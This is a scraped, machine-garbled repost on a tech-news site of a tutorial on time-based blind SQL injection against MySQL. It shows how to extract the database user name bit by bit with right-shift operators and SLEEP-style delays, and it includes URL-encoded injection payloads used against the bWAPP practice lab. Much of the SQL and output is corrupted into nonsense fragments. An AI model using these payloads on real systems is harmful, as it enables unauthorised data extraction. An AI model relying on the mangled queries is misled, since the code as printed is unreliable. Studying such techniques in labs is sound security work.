In addition to Weibo, there is also WeChat
Please pay attention
WeChat public account
Shulou
2025-03-31 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >
Share
Shulou(Shulou.com)06/01 Report--
This article focuses on "how to use MySQL bit functions and operators for efficient time-based SQL blind injection", interested friends may wish to take a look. The method introduced in this paper is simple, fast and practical. Let's let the editor take you to learn "how to use MySQL bit functions and operators for efficient time-based SQL blind injection"!
The right shift operator shifts the 1-bit bit of the binary value to the right, as follows:
Mysql > select ascii (bread01110010'); +-+ | ascii (bread01110010') | +-+ | 114 | +-+ 1 row in set (0.00 sec) mysql > select ascii (bread01110010') > > 1 +-+ | ascii (bread01110010') > > 1 | +-+ | 57 | +-+ 1 row in set (0.00 sec)
This can be used to enumerate the characters of a string when SQL is blind. If the data appears in the complete ASCII table, you can enumerate up to 8 requests per character.
The data we want to extract here is the first character returned by the select user () query.
No. 1:
We first find the first value:
?
There are two possibilities:
0 (Decimal value: 0) / / TRUE condition
Or
1 (Decimal value: 1) / / FALSE condition
Mysql > select if ((ascii ((substr (user (), 1 test') > > 7) = 0 false' +-+ | if ((ascii ((substr (user (), 1 test') > > 7) = 0 test' (1000 000) 'false') | +-+ | 0 | | +-+ 1 row in set (2.35 sec) |
The SQL query causes a time delay, so the condition is TRUE and the first bit is 0
0?
No. 2:
Now let's look for the value of the second bit, and there are two possibilities as above:
00 (Decimal value: 0) / / TRUE condition
Or
01 (Decimal value: 1) / / FALSE condition
Mysql > select if ((ascii ((substr (user (), 1 test') > > 6) = 0 false' +-+ | if ((ascii ((substr (user (), 1 test') > > 6) = 0 test' (1000 000) 'false') | +-+ | false | | +-+ 1 row in set (0.00 sec) |
The SQL query has no time delay, so the condition is that the second bit of FALSE is 1.
01?
No. 3:
Now let's look for the value of the third bit, and there are the same two possibilities:
010 (Decimal value: 2) / / TRUE
Or
011 (Decimal value: 3) / / FALSE
Mysql > select if ((ascii ((substr (user (), 1 test') > > 5) = 2 false' +-+ | if ((ascii ((substr (user (), 1 test') > > 5) = 2 test' 'false') | +-+ | false | | +-+ 1 row in set (0.00 sec) |
The SQL query has no time delay, so the condition is that the third bit of FALSE is 1.
011?
No. 4:
Now let's look for the value of the fourth bit, two possibilities:
0110 (Decimal: 6) / / TRUE
Or
0111 (Decimal: 7) / / FALSE
Mysql > select if ((ascii ((substr (user (), 1p1)) > > 4) = 6 false' (1000000000 test' ('test') +-+ | if ((ascii ((substr (user (), 1 test') > > 4) = 6 test' (1000 000) 'false') | +-+ | false | | +-+ 1 row in set (0.00 sec) |
The SQL query has no time delay, so the condition is that the fourth bit of FALSE is 1.
0111????
No. 5:
Now let's look for the value of the fifth place, two possibilities:
01110 (Decimal: 14) / TRUE
Or
01111 (Decimal: 15) / / FALSE
Mysql > select if ((ascii ((substr (user (), 1 test') > > 3) = 14 false' +-+ | if ((ascii ((substr (user (), 1 test') > > 3) = 14 test' (1000 000) 'false') | +-+ | 0 | | +-+ 1 row in set (2.46 sec) |
The SQL query causes a time delay, so the condition is that the fifth bit of TRUE is 0
01110???
No. 6:
Now let's look for the value of the sixth bit, two possibilities:
011100 (Decimal: 28) / / TRUE
Or
011101 (Decimal: 29) / / FALSE
Mysql > select if ((ascii ((substr (user (), 1 test') > > 2) = 28 false' +-+ | if ((ascii ((substr (user (), 1 test') > > 2) = 28 test' 'false') | +-+ | 0 | | +-+ 1 row in set (2.44 sec) |
The SQL query causes a time delay, so the condition is that the sixth bit of TRUE is 0
011100??
No. 7:
Now let's look for the value of the seventh bit, two possibilities:
0111000 (Decimal: 56) / / TRUE
Or
0111001 (Decimal: 57) / / FALSE
Mysql > select if ((ascii ((substr (user (), 1 test') > > 1) = 56 false' +-+ | if ((ascii ((substr (user (), 1 test') > > 1) = 56 test' 'false') | +-+ | false | | +-+ 1 row in set (0.00 sec) |
The SQL query has no time delay, so the condition is that the seventh bit of FALSE is 1.
The fourth place must be 1
0111001?
No. 8:
Now let's look for the value of the eighth digit, two possibilities:
01110010 (Decimal: 114) / / TRUE
Or
01110011 (Decimal: 115) / / FALSE
Mysql > select if ((ascii ((substr (user (), 1 test') > > 0) = 114 false' (1000000) +-+ | if ((ascii ((substr (user (), 1 test') > > 0) = 114 test' (1000 000) 'false') | +-+ | 0 | | +-+ 1 row in set (2.33 sec) |
The SQL query causes a time delay, so the condition is that the eighth bit of TRUE is 0
01110010
At this point, we have fully obtained the binary value of the first character returned by the select user () query, which is converted to decimal. However, 114 represents the r character in the ASCII table, so the first letter of the database user name is r.
Mysql > select user (); +-+ | user () | +-+ | root@localhost | +-+ 1 row in set (0.00 sec)
To illustrate this type of SQL blind injection attack, I have shown you how to enumerate the first and last binary bits of the first character returned by "select user ()" on bWAPP vulnerable applications: https://www.vulnhub.com/entry/bwapp-bee-box-v16,53/
1. The first bit of SQLi string returns the TRUE condition:
Test%27+and+if+ ((ascii ((substr (user (), 1pr 1) + > > + 7 +) = 0 false' 5 ('test')), +' false') 23
two。 The first bit of SQLi string returns the FALSE condition:
Test%27+and+if+ ((ascii ((substr (user (), 1 test') + > > + 7 +) = 1 test'), + 'false') 23
3. The eighth bit SQLi string returns the FALSE condition:
Test%27+and+if+ ((ascii ((substr (user (), 1 test') + > > + 0 +) = 114 false' 5 ('test')), +' false') 23
At this point, I believe you have a deeper understanding of "how to use MySQL bit functions and operators for efficient time-based SQL blind injection". You might as well do it in practice. Here is the website, more related content can enter the relevant channels to inquire, follow us, continue to learn!
Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.
Views: 0
*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.
Continue with the installation of the previous hadoop.First, install zookooper1. Decompress zookoope
"Every 5-10 years, there's a rare product, a really special, very unusual product that's the most un
© 2024 shulou.com SLNews company. All rights reserved.